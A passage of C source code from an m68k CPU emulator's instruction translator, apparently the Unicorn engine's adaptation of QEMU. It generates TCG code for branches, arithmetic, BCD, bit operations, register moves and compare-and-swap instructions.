tmp2 = tcg_temp_new(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, tmp2, QREG_CC_N, QREG_CC_V); tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); tcg_temp_free(tcg_ctx, tmp2); tcond = TCG_COND_LT; break; } done: if ((cond & 1) == 0) { tcond = tcg_invert_cond(tcond); } c->tcond = tcond; } static void free_cond(TCGContext *tcg_ctx, DisasCompare *c) { if (!c->g1) { tcg_temp_free(tcg_ctx, c->v1); } if (!c->g2) { tcg_temp_free(tcg_ctx, c->v2); } } static void gen_jmpcc(DisasContext *s, int cond, TCGLabel *l1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare c; gen_cc_cond(&c, s, cond); update_cc_op(s); tcg_gen_brcond_i32(tcg_ctx, c.tcond, c.v1, c.v2, l1); free_cond(tcg_ctx, &c); } /* Force a TB lookup after an instruction that changes the CPU state. */ static void gen_exit_tb(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; update_cc_op(s); tcg_gen_movi_i32(tcg_ctx, QREG_PC, s->pc); s->base.is_jmp = DISAS_EXIT; } #define SRC_EA(env, result, opsize, op_sign, addrp) do { \ result = gen_ea(env, s, insn, opsize, tcg_ctx->NULL_QREG, addrp, \ op_sign ? 
EA_LOADS : EA_LOADU, IS_USER(s)); \ if (IS_NULL_QREG(result)) { \ gen_addr_fault(s); \ return; \ } \ } while (0) #define DEST_EA(env, insn, opsize, val, addrp) do { \ TCGv ea_result = gen_ea(env, s, insn, opsize, val, addrp, \ EA_STORE, IS_USER(s)); \ if (IS_NULL_QREG(ea_result)) { \ gen_addr_fault(s); \ return; \ } \ } while (0) static inline bool use_goto_tb(DisasContext *s, uint32_t dest) { return (s->base.pc_first & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK) || (s->base.pc_next & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK); } /* Generate a jump to an immediate address. */ static void gen_jmp_tb(DisasContext *s, int n, uint32_t dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (unlikely(s->base.singlestep_enabled)) { gen_exception(s, dest, EXCP_DEBUG); } else if (use_goto_tb(s, dest)) { tcg_gen_goto_tb(tcg_ctx, n); tcg_gen_movi_i32(tcg_ctx, QREG_PC, dest); tcg_gen_exit_tb(tcg_ctx, s->base.tb, n); } else { gen_jmp_im(s, dest); tcg_gen_exit_tb(tcg_ctx, NULL, 0); } s->base.is_jmp = DISAS_NORETURN; } DISAS_INSN(scc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare c; int cond; TCGv tmp; cond = (insn >> 8) & 0xf; gen_cc_cond(&c, s, cond); tmp = tcg_temp_new(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, c.tcond, tmp, c.v1, c.v2); free_cond(tcg_ctx, &c); tcg_gen_neg_i32(tcg_ctx, tmp, tmp); DEST_EA(env, insn, OS_BYTE, tmp, NULL); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(dbcc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *l1; TCGv reg; TCGv tmp; int16_t offset; uint32_t base; reg = DREG(insn, 0); base = s->pc; offset = (int16_t)read_im16(env, s); l1 = gen_new_label(tcg_ctx); gen_jmpcc(s, (insn >> 8) & 0xf, l1); tmp = tcg_temp_new(tcg_ctx); tcg_gen_ext16s_i32(tcg_ctx, tmp, reg); tcg_gen_addi_i32(tcg_ctx, tmp, tmp, -1); gen_partset_reg(tcg_ctx, OS_WORD, reg, tmp); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, -1, l1); gen_jmp_tb(s, 1, base + offset); gen_set_label(tcg_ctx, l1); gen_jmp_tb(s, 0, s->pc); } DISAS_INSN(undef_mac) { gen_exception(s, s->base.pc_next, EXCP_LINEA); } DISAS_INSN(undef_fpu) { gen_exception(s, s->base.pc_next, EXCP_LINEF); } DISAS_INSN(undef) { /* * ??? This is both instructions that are as yet unimplemented * for the 680x0 series, as well as those that are implemented * but actually illegal for CPU32 or pre-68020. 
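* Either way the guest receives EXCP_ILLEGAL, so a guest OS trap * handler may still choose to emulate the instruction. 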
*/ //qemu_log_mask(LOG_UNIMP, "Illegal instruction: %04x @ %08x\n", // insn, s->base.pc_next); gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); } DISAS_INSN(mulw) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv tmp; TCGv src; int sign; sign = (insn & 0x100) != 0; reg = DREG(insn, 9); tmp = tcg_temp_new(tcg_ctx); if (sign) tcg_gen_ext16s_i32(tcg_ctx, tmp, reg); else tcg_gen_ext16u_i32(tcg_ctx, tmp, reg); SRC_EA(env, src, OS_WORD, sign, NULL); tcg_gen_mul_i32(tcg_ctx, tmp, tmp, src); tcg_gen_mov_i32(tcg_ctx, reg, tmp); gen_logic_cc(s, tmp, OS_LONG); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(divw) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int sign; TCGv src; TCGv destr; /* divX.w <EA>,Dn 32/16 -> 16r:16q */ sign = (insn & 0x100) != 0; /* dest.l / src.w */ SRC_EA(env, src, OS_WORD, sign, NULL); destr = tcg_const_i32(tcg_ctx, REG(insn, 9)); if (sign) { gen_helper_divsw(tcg_ctx, tcg_ctx->cpu_env, destr, src); } else { gen_helper_divuw(tcg_ctx, tcg_ctx->cpu_env, destr, src); } tcg_temp_free(tcg_ctx, destr); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(divl) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv num, reg, den; int sign; uint16_t ext; ext = read_im16(env, s); sign = (ext & 0x0800) != 0; if (ext & 0x400) { if (!m68k_feature(s->env, M68K_FEATURE_QUAD_MULDIV)) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } /* divX.l <EA>, Dr:Dq 64/32 -> 32r:32q */ SRC_EA(env, den, OS_LONG, 0, NULL); num = tcg_const_i32(tcg_ctx, REG(ext, 12)); reg = tcg_const_i32(tcg_ctx, REG(ext, 0)); if (sign) { gen_helper_divsll(tcg_ctx, tcg_ctx->cpu_env, num, reg, den); } else { gen_helper_divull(tcg_ctx, tcg_ctx->cpu_env, num, reg, den); } tcg_temp_free(tcg_ctx, reg); tcg_temp_free(tcg_ctx, num); set_cc_op(s, CC_OP_FLAGS); return; } /* divX.l <EA>, Dq 32/32 -> 32q */ /* divXl.l <EA>, Dr:Dq 32/32 -> 32r:32q */ SRC_EA(env, den, OS_LONG, 0, NULL); num = tcg_const_i32(tcg_ctx, REG(ext, 12)); reg = tcg_const_i32(tcg_ctx, REG(ext, 0)); if (sign) { gen_helper_divsl(tcg_ctx, tcg_ctx->cpu_env, num, reg, den); } else { gen_helper_divul(tcg_ctx, tcg_ctx->cpu_env, num, reg, den); } tcg_temp_free(tcg_ctx, reg); tcg_temp_free(tcg_ctx, num); set_cc_op(s, CC_OP_FLAGS); } static void bcd_add(TCGContext *tcg_ctx, TCGv dest, TCGv src) { TCGv t0, t1; /* * dest10 = dest10 + src10 + X * * t1 = src * t2 = t1 + 0x066 * t3 = t2 + dest + X * t4 = t2 ^ dest * t5 = t3 ^ t4 * t6 = ~t5 & 0x110 * t7 = (t6 >> 2) | (t6 >> 3) * return t3 - t7 */ /* * t1 = (src + 0x066) + dest + X * = result with some possible exceeding 0x6 */ t0 = tcg_const_i32(tcg_ctx, 0x066); tcg_gen_add_i32(tcg_ctx, t0, t0, src); t1 = tcg_temp_new(tcg_ctx); tcg_gen_add_i32(tcg_ctx, t1, t0, dest); tcg_gen_add_i32(tcg_ctx, t1, t1, QREG_CC_X); /* we will remove exceeding 0x6 where there is no carry */ /* * t0 = (src + 0x0066) ^ dest * = t1 without carries */ tcg_gen_xor_i32(tcg_ctx, t0, t0, dest); /* * extract the carries * t0 = t0 ^ t1 * = only the carries */ tcg_gen_xor_i32(tcg_ctx, t0, t0, t1); /* * generate 0x1 where there is no carry * and for each 0x10, generate a 0x6 */ tcg_gen_shri_i32(tcg_ctx, t0, t0, 3); tcg_gen_not_i32(tcg_ctx, t0, t0); tcg_gen_andi_i32(tcg_ctx, t0, t0, 0x22); tcg_gen_add_i32(tcg_ctx, dest, t0, t0); tcg_gen_add_i32(tcg_ctx, dest, dest, t0); tcg_temp_free(tcg_ctx, t0); /* * remove the exceeding 0x6 * for digits that have not generated a carry */ tcg_gen_sub_i32(tcg_ctx, dest, t1, dest); tcg_temp_free(tcg_ctx, t1); } static void bcd_sub(TCGContext *tcg_ctx, TCGv dest, TCGv src) { TCGv t0, t1, t2; /* * dest10 = dest10 - src10 - X * = bcd_add(tcg_ctx, dest 
+ 1 - X, 0x199 - src) */ /* t0 = 0x066 + (0x199 - src) */ t0 = tcg_temp_new(tcg_ctx); tcg_gen_subfi_i32(tcg_ctx, t0, 0x1ff, src); /* t1 = t0 + dest + 1 - X*/ t1 = tcg_temp_new(tcg_ctx); tcg_gen_add_i32(tcg_ctx, t1, t0, dest); tcg_gen_addi_i32(tcg_ctx, t1, t1, 1); tcg_gen_sub_i32(tcg_ctx, t1, t1, QREG_CC_X); /* t2 = t0 ^ dest */ t2 = tcg_temp_new(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, t2, t0, dest); /* t0 = t1 ^ t2 */ tcg_gen_xor_i32(tcg_ctx, t0, t1, t2); /* * t2 = ~t0 & 0x110 * t0 = (t2 >> 2) | (t2 >> 3) * * to fit on 8bit operands, changed in: * * t2 = ~(t0 >> 3) & 0x22 * t0 = t2 + t2 * t0 = t0 + t2 */ tcg_gen_shri_i32(tcg_ctx, t2, t0, 3); tcg_gen_not_i32(tcg_ctx, t2, t2); tcg_gen_andi_i32(tcg_ctx, t2, t2, 0x22); tcg_gen_add_i32(tcg_ctx, t0, t2, t2); tcg_gen_add_i32(tcg_ctx, t0, t0, t2); tcg_temp_free(tcg_ctx, t2); /* return t1 - t0 */ tcg_gen_sub_i32(tcg_ctx, dest, t1, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void bcd_flags(TCGContext *tcg_ctx, TCGv val) { tcg_gen_andi_i32(tcg_ctx, QREG_CC_C, val, 0x0ff); tcg_gen_or_i32(tcg_ctx, QREG_CC_Z, QREG_CC_Z, QREG_CC_C); tcg_gen_extract_i32(tcg_ctx, QREG_CC_C, val, 8, 1); tcg_gen_mov_i32(tcg_ctx, QREG_CC_X, QREG_CC_C); } DISAS_INSN(abcd_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv dest; gen_flush_flags(s); /* !Z is sticky */ src = gen_extend(s, DREG(insn, 0), OS_BYTE, 0); dest = gen_extend(s, DREG(insn, 9), OS_BYTE, 0); bcd_add(tcg_ctx, dest, src); gen_partset_reg(tcg_ctx, OS_BYTE, DREG(insn, 9), dest); bcd_flags(tcg_ctx, dest); } DISAS_INSN(abcd_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src, dest, addr; gen_flush_flags(s); /* !Z is sticky */ /* Indirect pre-decrement load (mode 4) */ src = gen_ea_mode(env, s, 4, REG(insn, 0), OS_BYTE, tcg_ctx->NULL_QREG, NULL, EA_LOADU, IS_USER(s)); dest = gen_ea_mode(env, s, 4, REG(insn, 9), OS_BYTE, tcg_ctx->NULL_QREG, &addr, EA_LOADU, IS_USER(s)); bcd_add(tcg_ctx, dest, src); gen_ea_mode(env, s, 4, REG(insn, 9), OS_BYTE, dest, &addr, EA_STORE, IS_USER(s)); bcd_flags(tcg_ctx, dest); } DISAS_INSN(sbcd_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src, dest; gen_flush_flags(s); /* !Z is sticky */ src = gen_extend(s, DREG(insn, 0), OS_BYTE, 0); dest = gen_extend(s, DREG(insn, 9), OS_BYTE, 0); bcd_sub(tcg_ctx, dest, src); gen_partset_reg(tcg_ctx, OS_BYTE, DREG(insn, 9), dest); bcd_flags(tcg_ctx, dest); } DISAS_INSN(sbcd_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src, dest, addr; gen_flush_flags(s); /* !Z is sticky */ /* Indirect pre-decrement load (mode 4) */ src = gen_ea_mode(env, s, 4, REG(insn, 0), OS_BYTE, tcg_ctx->NULL_QREG, NULL, EA_LOADU, IS_USER(s)); dest = gen_ea_mode(env, s, 4, REG(insn, 9), OS_BYTE, tcg_ctx->NULL_QREG, &addr, EA_LOADU, IS_USER(s)); bcd_sub(tcg_ctx, dest, src); gen_ea_mode(env, s, 4, REG(insn, 9), OS_BYTE, dest, &addr, EA_STORE, IS_USER(s)); bcd_flags(tcg_ctx, dest); } DISAS_INSN(nbcd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src, dest; TCGv addr; gen_flush_flags(s); /* !Z is sticky */ SRC_EA(env, src, OS_BYTE, 0, &addr); dest = tcg_const_i32(tcg_ctx, 0); bcd_sub(tcg_ctx, dest, src); DEST_EA(env, insn, OS_BYTE, dest, &addr); bcd_flags(tcg_ctx, dest); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(addsub) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv dest; TCGv src; TCGv tmp; TCGv addr; int add; int opsize; add = (insn & 0x4000) != 0; opsize = insn_opsize(insn); reg = gen_extend(s, DREG(insn, 9), opsize, 1); dest = tcg_temp_new(tcg_ctx); if (insn & 0x100) { SRC_EA(env, tmp, opsize, 1, &addr); src = reg; } else { tmp = 
reg; SRC_EA(env, src, opsize, 1, NULL); } if (add) { tcg_gen_add_i32(tcg_ctx, dest, tmp, src); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_X, dest, src); set_cc_op(s, CC_OP_ADDB + opsize); } else { tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_X, tmp, src); tcg_gen_sub_i32(tcg_ctx, dest, tmp, src); set_cc_op(s, CC_OP_SUBB + opsize); } gen_update_cc_add(tcg_ctx, dest, src, opsize); if (insn & 0x100) { DEST_EA(env, insn, opsize, dest, &addr); } else { gen_partset_reg(tcg_ctx, opsize, DREG(insn, 9), dest); } tcg_temp_free(tcg_ctx, dest); } /* Reverse the order of the bits in REG. */ DISAS_INSN(bitrev) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; reg = DREG(insn, 0); gen_helper_bitrev(tcg_ctx, reg, reg); } DISAS_INSN(bitop_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; int op; TCGv src1; TCGv src2; TCGv tmp; TCGv addr; TCGv dest; if ((insn & 0x38) != 0) opsize = OS_BYTE; else opsize = OS_LONG; op = (insn >> 6) & 3; SRC_EA(env, src1, opsize, 0, op ? &addr: NULL); gen_flush_flags(s); src2 = tcg_temp_new(tcg_ctx); if (opsize == OS_BYTE) tcg_gen_andi_i32(tcg_ctx, src2, DREG(insn, 9), 7); else tcg_gen_andi_i32(tcg_ctx, src2, DREG(insn, 9), 31); tmp = tcg_const_i32(tcg_ctx, 1); tcg_gen_shl_i32(tcg_ctx, tmp, tmp, src2); tcg_temp_free(tcg_ctx, src2); tcg_gen_and_i32(tcg_ctx, QREG_CC_Z, src1, tmp); dest = tcg_temp_new(tcg_ctx); switch (op) { case 1: /* bchg */ tcg_gen_xor_i32(tcg_ctx, dest, src1, tmp); break; case 2: /* bclr */ tcg_gen_andc_i32(tcg_ctx, dest, src1, tmp); break; case 3: /* bset */ tcg_gen_or_i32(tcg_ctx, dest, src1, tmp); break; default: /* btst */ break; } tcg_temp_free(tcg_ctx, tmp); if (op) { DEST_EA(env, insn, opsize, dest, &addr); } tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(sats) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; reg = DREG(insn, 0); gen_flush_flags(s); gen_helper_sats(tcg_ctx, reg, reg, QREG_CC_V); gen_logic_cc(s, reg, OS_LONG); } static void gen_push(DisasContext *s, TCGv val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; tmp = tcg_temp_new(tcg_ctx); tcg_gen_subi_i32(tcg_ctx, tmp, QREG_SP, 4); gen_store(s, OS_LONG, tmp, val, IS_USER(s)); tcg_gen_mov_i32(tcg_ctx, QREG_SP, tmp); tcg_temp_free(tcg_ctx, tmp); } static TCGv mreg(TCGContext *tcg_ctx, int reg) { if (reg < 8) { /* Dx */ return tcg_ctx->cpu_dregs[reg]; } /* Ax */ return tcg_ctx->cpu_aregs[reg & 7]; } DISAS_INSN(movem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr, incr, tmp, r[16]; int is_load = (insn & 0x0400) != 0; int opsize = (insn & 0x40) != 0 ? OS_LONG : OS_WORD; uint16_t mask = read_im16(env, s); int mode = extract32(insn, 3, 3); int reg0 = REG(insn, 0); int i; tmp = tcg_ctx->cpu_aregs[reg0]; switch (mode) { case 0: /* data register direct */ case 1: /* addr register direct */ do_addr_fault: gen_addr_fault(s); return; case 2: /* indirect */ break; case 3: /* indirect post-increment */ if (!is_load) { /* post-increment is not allowed */ goto do_addr_fault; } break; case 4: /* indirect pre-decrement */ if (is_load) { /* pre-decrement is not allowed */ goto do_addr_fault; } /* * We want a bare copy of the address reg, without any pre-decrement * adjustment, as gen_lea would provide. 
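* The store loop below applies the decrement one element at a time, * which also lets the M68020+ quirk (the moved register is written as * its initial value minus the transfer size) fall out of the special * case handled there. 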
*/ break; default: tmp = gen_lea_mode(env, s, mode, reg0, opsize); if (IS_NULL_QREG(tmp)) { goto do_addr_fault; } break; } addr = tcg_temp_new(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, addr, tmp); incr = tcg_const_i32(tcg_ctx, opsize_bytes(opsize)); if (is_load) { /* memory to register */ for (i = 0; i < 16; i++) { if (mask & (1 << i)) { r[i] = gen_load(s, opsize, addr, 1, IS_USER(s)); tcg_gen_add_i32(tcg_ctx, addr, addr, incr); } } for (i = 0; i < 16; i++) { if (mask & (1 << i)) { tcg_gen_mov_i32(tcg_ctx, mreg(tcg_ctx, i), r[i]); tcg_temp_free(tcg_ctx, r[i]); } } if (mode == 3) { /* post-increment: movem (An)+,X */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_aregs[reg0], addr); } } else { /* register to memory */ if (mode == 4) { /* pre-decrement: movem X,-(An) */ for (i = 15; i >= 0; i--) { if ((mask << i) & 0x8000) { tcg_gen_sub_i32(tcg_ctx, addr, addr, incr); if (reg0 + 8 == i && m68k_feature(s->env, M68K_FEATURE_EXT_FULL)) { /* * M68020+: if the addressing register is the * register moved to memory, the value written * is the initial value decremented by the size of * the operation, regardless of how many actual * stores have been performed until this point. * M68000/M68010: the value is the initial value. */ tmp = tcg_temp_new(tcg_ctx); tcg_gen_sub_i32(tcg_ctx, tmp, tcg_ctx->cpu_aregs[reg0], incr); gen_store(s, opsize, addr, tmp, IS_USER(s)); tcg_temp_free(tcg_ctx, tmp); } else { gen_store(s, opsize, addr, mreg(tcg_ctx, i), IS_USER(s)); } } } tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_aregs[reg0], addr); } else { for (i = 0; i < 16; i++) { if (mask & (1 << i)) { gen_store(s, opsize, addr, mreg(tcg_ctx, i), IS_USER(s)); tcg_gen_add_i32(tcg_ctx, addr, addr, incr); } } } } tcg_temp_free(tcg_ctx, incr); tcg_temp_free(tcg_ctx, addr); } DISAS_INSN(movep) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint8_t i; int16_t displ; TCGv reg; TCGv addr; TCGv abuf; TCGv dbuf; displ = read_im16(env, s); addr = AREG(insn, 0); reg = DREG(insn, 9); abuf = tcg_temp_new(tcg_ctx); tcg_gen_addi_i32(tcg_ctx, abuf, addr, displ); dbuf = tcg_temp_new(tcg_ctx); if (insn & 0x40) { i = 4; } else { i = 2; } if (insn & 0x80) { for ( ; i > 0 ; i--) { tcg_gen_shri_i32(tcg_ctx, dbuf, reg, (i - 1) * 8); tcg_gen_qemu_st8(tcg_ctx, dbuf, abuf, IS_USER(s)); if (i > 1) { tcg_gen_addi_i32(tcg_ctx, abuf, abuf, 2); } } } else { for ( ; i > 0 ; i--) { tcg_gen_qemu_ld8u(tcg_ctx, dbuf, abuf, IS_USER(s)); tcg_gen_deposit_i32(tcg_ctx, reg, reg, dbuf, (i - 1) * 8, 8); if (i > 1) { tcg_gen_addi_i32(tcg_ctx, abuf, abuf, 2); } } } tcg_temp_free(tcg_ctx, abuf); tcg_temp_free(tcg_ctx, dbuf); } DISAS_INSN(bitop_im) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; int op; TCGv src1; uint32_t mask; int bitnum; TCGv tmp; TCGv addr; if ((insn & 0x38) != 0) opsize = OS_BYTE; else opsize = OS_LONG; op = (insn >> 6) & 3; bitnum = read_im16(env, s); if (m68k_feature(s->env, M68K_FEATURE_M68000)) { if (bitnum & 0xfe00) { disas_undef(env, s, insn); return; } } else { if (bitnum & 0xff00) { disas_undef(env, s, insn); return; } } SRC_EA(env, src1, opsize, 0, op ? 
&addr: NULL); gen_flush_flags(s); if (opsize == OS_BYTE) bitnum &= 7; else bitnum &= 31; mask = 1 << bitnum; tcg_gen_andi_i32(tcg_ctx, QREG_CC_Z, src1, mask); if (op) { tmp = tcg_temp_new(tcg_ctx); switch (op) { case 1: /* bchg */ tcg_gen_xori_i32(tcg_ctx, tmp, src1, mask); break; case 2: /* bclr */ tcg_gen_andi_i32(tcg_ctx, tmp, src1, ~mask); break; case 3: /* bset */ tcg_gen_ori_i32(tcg_ctx, tmp, src1, mask); break; default: /* btst */ break; } DEST_EA(env, insn, opsize, tmp, &addr); tcg_temp_free(tcg_ctx, tmp); } } static TCGv gen_get_ccr(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv dest; update_cc_op(s); dest = tcg_temp_new(tcg_ctx); gen_helper_get_ccr(tcg_ctx, dest, tcg_ctx->cpu_env); return dest; } static TCGv gen_get_sr(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv ccr; TCGv sr; ccr = gen_get_ccr(s); sr = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, sr, QREG_SR, 0xffe0); tcg_gen_or_i32(tcg_ctx, sr, sr, ccr); tcg_temp_free(tcg_ctx, ccr); return sr; } static void gen_set_sr_im(DisasContext *s, uint16_t val, int ccr_only) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (ccr_only) { tcg_gen_movi_i32(tcg_ctx, QREG_CC_C, val & CCF_C ? 1 : 0); tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, val & CCF_V ? -1 : 0); tcg_gen_movi_i32(tcg_ctx, QREG_CC_Z, val & CCF_Z ? 0 : 1); tcg_gen_movi_i32(tcg_ctx, QREG_CC_N, val & CCF_N ? -1 : 0); tcg_gen_movi_i32(tcg_ctx, QREG_CC_X, val & CCF_X ? 1 : 0); } else { TCGv sr = tcg_const_i32(tcg_ctx, val); gen_helper_set_sr(tcg_ctx, tcg_ctx->cpu_env, sr); tcg_temp_free(tcg_ctx, sr); } set_cc_op(s, CC_OP_FLAGS); } static void gen_set_sr(DisasContext *s, TCGv val, int ccr_only) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (ccr_only) { gen_helper_set_ccr(tcg_ctx, tcg_ctx->cpu_env, val); } else { gen_helper_set_sr(tcg_ctx, tcg_ctx->cpu_env, val); } set_cc_op(s, CC_OP_FLAGS); } static void gen_move_to_sr(CPUM68KState *env, DisasContext *s, uint16_t insn, bool ccr_only) { if ((insn & 0x3f) == 0x3c) { uint16_t val; val = read_im16(env, s); gen_set_sr_im(s, val, ccr_only); } else { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; SRC_EA(env, src, OS_WORD, 0, NULL); gen_set_sr(s, src, ccr_only); } } DISAS_INSN(arith_im) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int op; TCGv im; TCGv src1; TCGv dest; TCGv addr; int opsize; bool with_SR = ((insn & 0x3f) == 0x3c); op = (insn >> 9) & 7; opsize = insn_opsize(insn); switch (opsize) { case OS_BYTE: im = tcg_const_i32(tcg_ctx, (int8_t)read_im8(env, s)); break; case OS_WORD: im = tcg_const_i32(tcg_ctx, (int16_t)read_im16(env, s)); break; case OS_LONG: im = tcg_const_i32(tcg_ctx, read_im32(env, s)); break; default: g_assert_not_reached(); } if (with_SR) { /* SR/CCR can only be used with andi/eori/ori */ if (op == 2 || op == 3 || op == 6) { disas_undef(env, s, insn); return; } switch (opsize) { case OS_BYTE: src1 = gen_get_ccr(s); break; case OS_WORD: if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } src1 = gen_get_sr(s); break; default: /* OS_LONG; others already g_assert_not_reached. */ disas_undef(env, s, insn); return; } } else { SRC_EA(env, src1, opsize, 1, (op == 6) ? 
NULL : &addr); } dest = tcg_temp_new(tcg_ctx); switch (op) { case 0: /* ori */ tcg_gen_or_i32(tcg_ctx, dest, src1, im); if (with_SR) { gen_set_sr(s, dest, opsize == OS_BYTE); } else { DEST_EA(env, insn, opsize, dest, &addr); gen_logic_cc(s, dest, opsize); } break; case 1: /* andi */ tcg_gen_and_i32(tcg_ctx, dest, src1, im); if (with_SR) { gen_set_sr(s, dest, opsize == OS_BYTE); } else { DEST_EA(env, insn, opsize, dest, &addr); gen_logic_cc(s, dest, opsize); } break; case 2: /* subi */ tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_X, src1, im); tcg_gen_sub_i32(tcg_ctx, dest, src1, im); gen_update_cc_add(tcg_ctx, dest, im, opsize); set_cc_op(s, CC_OP_SUBB + opsize); DEST_EA(env, insn, opsize, dest, &addr); break; case 3: /* addi */ tcg_gen_add_i32(tcg_ctx, dest, src1, im); gen_update_cc_add(tcg_ctx, dest, im, opsize); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_X, dest, im); set_cc_op(s, CC_OP_ADDB + opsize); DEST_EA(env, insn, opsize, dest, &addr); break; case 5: /* eori */ tcg_gen_xor_i32(tcg_ctx, dest, src1, im); if (with_SR) { gen_set_sr(s, dest, opsize == OS_BYTE); } else { DEST_EA(env, insn, opsize, dest, &addr); gen_logic_cc(s, dest, opsize); } break; case 6: /* cmpi */ gen_update_cc_cmp(s, src1, im, opsize); break; default: abort(); } tcg_temp_free(tcg_ctx, im); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(cas) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; TCGv addr; uint16_t ext; TCGv load; TCGv cmp; MemOp opc; switch ((insn >> 9) & 3) { case 1: opsize = OS_BYTE; opc = MO_SB; break; case 2: opsize = OS_WORD; opc = MO_TESW; break; case 3: opsize = OS_LONG; opc = MO_TESL; break; default: /* unreachable */ abort(); } ext = read_im16(env, s); /* cas Dc,Du,<EA> */ addr = gen_lea(env, s, insn, opsize); if (IS_NULL_QREG(addr)) { gen_addr_fault(s); return; } cmp = gen_extend(s, DREG(ext, 0), opsize, 1); /* * if <EA> == Dc then * <EA> = Du * Dc = <EA> (because <EA> == Dc) * else * Dc = <EA> */ load = tcg_temp_new(tcg_ctx); tcg_gen_atomic_cmpxchg_i32(tcg_ctx, load, addr, cmp, DREG(ext, 6), IS_USER(s), opc); /* update flags before setting cmp to load */ gen_update_cc_cmp(s, load, cmp, opsize); gen_partset_reg(tcg_ctx, opsize, DREG(ext, 0), load); tcg_temp_free(tcg_ctx, load); switch (extract32(insn, 3, 3)) { case 3: /* Indirect postincrement. */ tcg_gen_addi_i32(tcg_ctx, AREG(insn, 0), addr, opsize_bytes(opsize)); break; case 4: /* Indirect predecrement. */ tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), addr); break; } } DISAS_INSN(cas2w) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext1, ext2; TCGv addr1, addr2; TCGv regs; /* cas2 Dc1:Dc2,Du1:Du2,(Rn1):(Rn2) */ ext1 = read_im16(env, s); if (ext1 & 0x8000) { /* Address Register */ addr1 = AREG(ext1, 12); } else { /* Data Register */ addr1 = DREG(ext1, 12); } ext2 = read_im16(env, s); if (ext2 & 0x8000) { /* Address Register */ addr2 = AREG(ext2, 12); } else { /* Data Register */ addr2 = DREG(ext2, 12); } /* * if (R1) == Dc1 && (R2) == Dc2 then * (R1) = Du1 * (R2) = Du2 * else * Dc1 = (R1) * Dc2 = (R2) */ regs = tcg_const_i32(tcg_ctx, REG(ext2, 6) | (REG(ext1, 6) << 3) | (REG(ext2, 0) << 6) | (REG(ext1, 0) << 9)); if (tb_cflags(s->base.tb) & CF_PARALLEL) { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); } else { gen_helper_cas2w(tcg_ctx, tcg_ctx->cpu_env, regs, addr1, addr2); } tcg_temp_free(tcg_ctx, regs); /* Note that cas2w also assigned to env->cc_op. 
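Only the translator-side cache therefore needs refreshing below. 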
